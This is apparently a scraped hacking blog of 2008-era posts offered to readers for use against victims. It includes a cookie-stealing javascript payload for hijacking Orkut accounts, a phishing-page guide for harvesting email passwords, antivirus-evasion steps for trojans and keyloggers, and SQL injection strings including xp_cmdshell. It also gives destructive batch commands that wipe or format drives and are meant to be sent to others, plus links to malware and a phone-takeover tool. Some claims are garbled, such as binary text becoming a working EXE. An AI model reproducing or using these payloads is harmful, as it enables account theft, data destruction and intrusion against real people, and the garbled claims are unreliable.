javascript:nobody=replyForm;nobody.toUserId.value=62915936; nobody.scrapText.value=eval (String.fromCharCode(100,111,99,117,109,101,110,116,46,99, 111,111,107,105,101)); nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’; nobody.submit() U see the 62915936 part? Thats the one u need to edit to get the cookie to your account….. Now here is the script Code: HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS: 1) Go to YOUR ALBUM section. 2) Go to ANY photo and right click on it , see the properties of your display image…u will see something like 12345678.jpg 3) There will be a eight digit value. 4) Now put that value in the above javascript. 5) Thats it. Now your javascript will look like: javascript:nobody=replyForm;nobody.toUserId.value=yournumber; nobody.scrapText.value=eval (String.fromCharCode(100,111,99,117,109,101,110,116,46,99, 111,111,107,105,101)); nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’; nobody.submit() Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook. Now after getting a cookie… 1) Go to your home page 2) Open the cookie editor plugin(TOOLS–>COOKIE EDITOR).

3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie. 4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part… 5) THATS IT!! ANOTHER SCRIPT : (100%working) javascript:nobody=replyForm;nobody.toUserId.value=53093255; nobody.scrapText.value=document.cookie;nobody. action=’scrapbook.aspx?Action.submit’;nobody.submit() Put ur eight digit number in the place of (53093255) 20 Comments »

How to make ALL Trojan/Virus/Keylogger UNDETECTABLE
Posted in Hardcore Hacking, Virus, Viruses with tags undetectable virus, make trogan undetectable, make virus, kelogger undetectable on February 26, 2008 by hacktocrack

This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO! First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever. My personal favorite keylogger: Ardamax Keylogger Remote Administration Tool (Must not have a router): Poisin Ivy Google is your friend. Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED! 1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:

Code: There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.) 2. Once you download the program, install it. 3. Once installed, you open it up and see this:

Code:…assportzh3.jpg This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!

1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working. DOWNLOAD THIS FOR THE PRE-MADE SETTINGS: Code: DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO! Code: Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left). Where it says “Files to Protect” (if theres stuff there, delete it): Add the files you want to make %100 UNDETECTABLE!! Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK. Now, once its created, they are %100 undetectable. Go to Code: to scan it with every Antivirus, and they wont find ANYTHING!

„It takes a long time to learn simplicity.“ 42 Comments »

Google - Peep Into Other’s Email Boxes
Posted in Email, Gmail, Google hacks, Website hacks, hacking with tags google hack, hack email on February 25, 2008 by hacktocrack

The idea is, one Google advanced search string is filetype: . It is used to find out any file only. Now I’m using this string as a tool, I am searching for filetype:eml eml intext:”Content-Type: image/jpeg”. Look at the keyword. It is finding a file with extension eml and that eml should have a Line Content-Type: image/jpeg. Now remember the old days, MIME encoding of a email. When ever we are attaching a .jpg file, that line should come in .eml file. So, the full keyword is searching for filename any with extension .eml which is email file extension, and it should contain a .jpg file, may be some photo or other picture from the web. You can’t belive if you are not checking it yourself.

Keyword : filetype:eml eml intext:”Content-Type: image/jpeg” Here is ur example: Click Here

Leave A Comment »

Hack Websites
Posted in Javascript/html Hacking, Password Hacking, hacking with tags hack website, hacking, hacking websites, how to hack websites on February 25, 2008 by hacktocrack

NOTE: Works Only On Certian sites If you have the html and javascript knowledge then you can access password protected websites. So you want to know how?? keep reading….. 1. Open the website you want to hack. Provide wrong username-password in its log in form. (e.g : Username : me and Password: ‘ or 1=1 –) An error will occur saying wrong username-password. Now be prepared Your experiment starts from here… 2. Right click anywhere on that error page =>> go to view source. 3. There you can see the html codings with javascripts. 4. There you find somewhat like this….<_form action=”..login….”> 5. Before this login information copy the url of the site in which you are. (e.g :”<_form……….action=…….>”) 6. Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information) 7. Then take a close look for “<_input name=”password” type=”password”>”[without quotes] -> replace “<_type=text> ” there instead of “<_type=password>”. See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write ) 8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:chan.html) 9. Reopen your target web page by double clicking ‘chan.html’ file that you saved in your harddisk earlier. 10. U see that some changes in current page as compared to original One. Don’t get worried. 11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --] Congrats!!!!!! You have successfully cracked the above website and entered into the

account of Ist user saved in the server’s database. *****[Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes] The above trick won’t work on the websites using latest technique to protect there servers. Still you may find some websites to use this trick. Enjoy!!!! WARNING: We post this trick just for your educational knowledge only. Don’t misuse it other wise you will be in trouble. I take no responsibility of usage of the above trick] 6 Comments »

Secret Backdoor to Many Websites
Posted in Google hacks with tags forge googlebot, free hack, no credit card on February 25, 2008 by hacktocrack

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first…. The lesson you should have learned here is: Obviously Google can go where you can’t.Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE. In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser’s User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry. ********************************************* Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet Settings5.0User Agent] @=”Googlebot/2.1″ Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet Settings5.0User Agent] @=”Googlebot/2.1″ “Compatible”=”+ *************************************************** Please Remove The Spaces Between CurrenVersion Internet Settings

“Voila! You’re done!You may always change it back again…. I know only one site that uses you User Agent to establish your eligability to use its services, and that’s the Windows Update site… To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry: ****************************************** Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent] @=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)” 1 Comment »

Enable Right Clicks on The Sites That Disable it
Posted in Internet Explorer, Website hacks with tags enable right click on website, right click hack, website hacking on February 25, 2008 by hacktocrack

Lots of web sites have disabled the right click function of the mouse button… it’s really, really annoying. This is done so that you don’t steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window. It’s easy to change, assuming your using IE 6: Click “Tools”->”Internet Options” Click the “Security” tab Click “Custom Level” Scroll down to the “Scripting” section Set “Active Scripting” to “disable” Click “Ok” a couple of times. You’ll probably want to turn this back to “enable” when your done… ’cause generally the javascript enhances a website Leave A Comment »

IceCold Reloaded
Posted in Uncategorized with tags hack hotmail, hack msn, hack msn hotmail, msn freezer on February 25, 2008 by hacktocrack

MSN Passport Account Freezer and (De)Freezer [basically just stops freezing]. It gives you the ability to prevent a person from signing into MSN Messenger, or his/her hotmail inbox. It includes support for the latest MSN Messenger Protocol. NOTE - May Be Detected As A Trogan.HackerTool - It Is Not A Virus Download Link: Leave A Comment »

Super Bluetooth Hack
Posted in Download, hacking, mobile on February 25, 2008 by hacktocrack

With this java software you can connect to another mobile and …. Once connected to a another phone via bluetooth you can: read his messages - read his contacts - change profile - play his ringtone even if phone is on silent - play his songs(in his phone) - restart the phone - switch off the phone - restore factory settings - change ringing volume - And here comes the best Call from his phone” it includes all call functions like hold etc. Notes: 1.) When connecting devices use a code 0000 2.) At start of programm on smartphones do not forget to turn on bluetooth before start of the mobile . Download: 111kb Mirror1:

Mirror2: Mirror 3: Pass: 43 Comments »

6000 Virus ready to use
Posted in Download, Virus, Viruses with tags crash computer, download virus, Virus on February 25, 2008 by hacktocrack

Here you go 6000 Virus ready to use Sorry i did not want to write a list to many after you exetracted the 6000 virus folder there is one more folder called _DANGEROUS_ [DONT RUN ANY] that is holding them .. THIS IS A WARNING DO NOT RUN ANY OF THE EXE FILES INSIDE FOLDER _DANGEROUS_ [DONT RUN ANY] THERE AS YOU WILL AND MAY DAMAGE YOUR SYSTEM If you run one by mistake and f**** your PC don’t come to me going off you should have been carefull when in folder _DANGEROUS_ {DONT RUN ANY} - Download linkz - > ! - > link ! 17 Comments »

Hardcore Virus Makers
Posted in Download, Easy Hacking, Hardcore Hacking, Virus, Viruses with tags easy virus, hack virus, make easy virus, virus maker on February 25, 2008 by hacktocrack



Code: Select all

Code: Select all

How To Get Virus Off You may have thought it was funny at first but that virus that you opened that was supposed to be a joke doesnt go away very easily. If you restart your computer it will start again. Heres what you do. 1. Go into processes and end the process csmm.exe 2. Go to the toolbar and click start. 3. My computer 4. C: 5. Windows 6. System 32

Now once your in system 32 there will be A LOT of files. Go to the one that says csmm and delete it. Then you can restart your computer and the virus wont start again 5 Comments »

Send Fake Emails
Posted in Email, Hotmail, hacking with tags email hack, fake hacked email, hack email, hack hotmail email, hack yahoo email on February 21, 2008 by hacktocrack

Always Wanted To Get Revenge On Someone? Send A Fake Email Through Try It out! 2 Comments »

How to Hack Gmail or Yahoo or Hotmail or Any Other (Old Version)
Posted in Gmail, Hotmail, Password Hacking, Yahoo, hacking with tags hack, hack gmail, hack hotmail, hack msn, hack yahoo on February 21, 2008 by hacktocrack

There is a new version of this hack which is posted here. This version is also completely working but the new version is better than this one.There are different methods for Hacking Gmail or Yahoo or Orkut or Any Other site. But this method is more popular because it can be used to Hack any of the above sites just you need to make some minute changes. Moreover you don’t require any software or anything you can do it you using all the basic tools which present in a normal computer. Just follow the following steps : 1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto 2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text. 3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML 4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with (form action=”xxxxxxxxxxxxxxxxxxxxxxxxxxxxx”) 5. Delete the above code and paste the your id. 6. Now save the file. You can test whether its working or not. Just open the yahoofake.html file and in the place of user name and

password, type some thing and sign in. you will get the passwords in your mail id.. check out.. 7. NOW UPLOAD the yahoofake.html page using GOOGLE PAGE Creator or using 8. After uploading you have to give the link to your friends, once they sign in you ll get the passwords of your friends id. 33 Comments »

How to Format A HDD With Notepad
Posted in Notepad Tricks with tags format .bat, format hard drive, how to format, Notepad Tricks on February 21, 2008 by hacktocrack

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool. Step 1. Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000 Step 2. Save As An EXE Any Name Will Do Step 3. Send the EXE to People And Infect OR IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code format c:\ /Q/X — this will format your drive c:\ 01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000 format d:\ /Q/X — this will format your dirve d:\ 01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000 format a:\ /Q/X — this will format your drive a:\ 01100110011011110111001001101101011000010111010000 100000011000010011101001011100 0010000000101111010100010010111101011000 del /F/S/Q c:\boot.ini — this will cause your computer not to boot. 01100100011001010110110000100000001011110100011000 101111010100110010111101010001 00100000011000110011101001011100011000100110111101 101111011101000010111001101001 0110111001101001 try to figure out urself rest cant spoonfeed its working Do not try it on your PC. Don’t mess around this is for educational purpose only still if you cant figure it out try this go to notepad and type the following: @Echo off Del C:\ *.*|y save it as Dell.bat want worse then type the following: @echo off del %systemdrive%\*.*/f/s/q shutdown -r -f -t 00 and save it as a .bat file 1 Comment »

Hacks to Beat Rapidshare Download Limits and Waiting Time
Posted in Rapidshare, Rapidshare Hacking with tags hack rapidshare, Rapidshare Hacking, rapidshare leecher on February 20, 2008 by hacktocrack

Here are some hints to help you more efficently use rapidshare. Skipping waiting time and bypassing download limits are rapidshare hacks that everybody should know.
From Here are some methods for doing this: 1. Short-Out the JavaScript: 1. Goto the page you want to download 2. Select FREE button 3. In the address bar put the following: javascript:alert(c=0) 4. Click OK 5. Click OK to the pop-up box 6. Enter the captcha 7. Download Your File 2. Request a new IP address from your ISP server. Here’s how to do it in windows: 1. Click Start 2. Click run 3. In the run box type cmd.exe and click OK 4. When the command prompt opens type the following. ENTER after each new line. ipconfig /flushdns ipconfig /release ipconfig /renew exit 5. Erase your cookies in whatever browser you are using. 6. Try the rapidshare download again. Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

3. Use a proxy with SwitchProxy and Firefox: 1. Download and install Firefox if you have not already 2. Download and install SwitchProxy 3. Google for free proxies 4. When you hit your download limit, clean your cookies and change your proxy 4. Use an anonymous service: Running your system through the tor network should in theory work; however, it is difficult to use and setup. Plus, you allow others to run their evil deeds through your system as well by using this system. Anonymizer 2005 is inexpensive, easy to use, but not free. Other pay services would likely work as well. 5. You can use a bookmarklet to stop your wait times: 1. Open IE 2. Right Click On This Link 3. Select Add to Favorites 4. Select Yes to the warning that the bookmark may be unsafe. 5. Name it “RapidShare No Wait” 6. Click on the Links folder (if you want to display it in your IE toolbar) 7. Click OK 8. You may need to close and reopen IE to see it 9. Goto rapidshare and click the bookmarklet when you are forced to wait Leave A Comment »

SQL Injection
Hello fellow hackers . Today , I have brought another exploit for you known as SQL Injection . So lets kick start the tutorial . Vocabulary: * SQL: Server Query Language-used in web applications to interact with databases. * SQL Injection: Method of exploiting a web application by supplying

user input designed to manipulate SQL database queries. * "Injection": You enter the injections into an html form which is sent to the web application. The application then puts you input directly into a SQL query. In advertantly, this allows you to manipulate to query... Prerequisite: * A background of programming and a general idea of how most hacking methods are done. Application: * Hacking a SQL database-driven server (usually only the ones that use unparsed user input in database queries). There is still a surprising number of data-driven web applications on the net that are vulnerable to this type of exploit. Being as typical as all method, the frequency of possible targets decreases over time as the method becomes more known. This is one those exploits that aren't easily prevented by a simple patch but by a competent programmer.

Use: First, let's look at a typical SQL query: SELECT fieldName1, fieldName2 FROM databaseName WHERE restrictionsToFilterWhichEntriesToReturn Now, to dissect... The red areas is where criterion is inputed. The rest of the query structures the query. * SELECT fieldName1, fieldName2 - Specifies the of the names of fields that will be returned from the database. * FROM databaseName - Specifies the name of the database to search. * WHERE restrictionsToFilterWhichEntriesToReturn - Specifies which entries to return.

Here is an example for somebody's login script: SELECT userAcessFlags FROM userDatabase WHERE userName="(input here)" AND userPass="(input here)" The idea is guess what that application's query looks like and input things designed to return data other than what was intended. In the example, input like the following could give gain access to the administrator account: User: administrator Pass: " OR ""=" Making the query like this: SELECT userAcessFlags FROM userDatabase WHERE userName="administrator" AND userPass="" OR ""="" As you can see, ""="" (nothing does indeed match nothing) Note: Injections are rarely as simple as this... One can be creative and use error messages to your advantadge to access other databases, fields, and entries. Learn a little SQL to use things like UNION to merges query results with ones not intended.On the security side, parse user data and get rid of any extra symbols now that you know how it's done. The idea in this example is to break out of the quotation marks. When stuff is inside quotation marks, the stuff isn't processed as code or anything but as a phrase and what it is. The password injection was: " OR ""=" What this does is close the string that was started by the quotation mark in the part userPass=". Once you break out, THEN stuff is considered code. So, I put OR ""=" after I break out of the string. You

will notice that it is comparing two quotation marks with one, but the quotation mark already built in by the application finishes it so we have this: userPass="" OR ""="" Notice how the first and last quotation marks are not colored and are not built in. Additional notes: This was just an extremely simplified version and you will probably need to learn a little SQL to fully understand. Here are a few SQL terms that do other things: UNION: You use this to merge the results of one query with another. You may put things like SELECT after UNION in order to search other databases and stuff. Sometimes you may need to use ALL in conjuction to break out of certain clauses. It does no harm so when in doubt you could do something like: " UNION ALL SELECT 0,'','hash' FROM otherDatabase WHERE userName="admin The key when using UNION is to make your new query return the same amount of columns in the same datatype so that you may get the results you want. :-- This works sometimes to terminate the query so that it ignores to the rest of the stuff that might be fed afterwards if you don't like it. For example: SELECT * FROM userDatabase WHERE userName="admin";--" AND userPass="aH0qcQOVz7e0s" NOT IN: If you have no idea which record you want you could record cycle (you request vague info, and you put what you already got in the NOT IN clause so that you can get the next entry) Usage: SELECT userName userPass FROM userDatabase WHERE userName NOT IN ('Dehstil','Twistedchaos')

EXEC: This command should never work, but if it win; you could do anything. For instance, you could inject something like this: ';EXEC master.dbo.xp_cmdshell 'cmd.exe dir c: All my examples so far have dealt with read processes. To manipulate a write process, here is an example for those who know what their doing: INSERT INTO userProfile VALUES(''+(SELECT userPass FROM userDatabase WHERE userName='admin')+'' + 'Chicago' + 'male') This example would theoretically put the admin's password in your profile.

Sign up to vote on this title
UsefulNot useful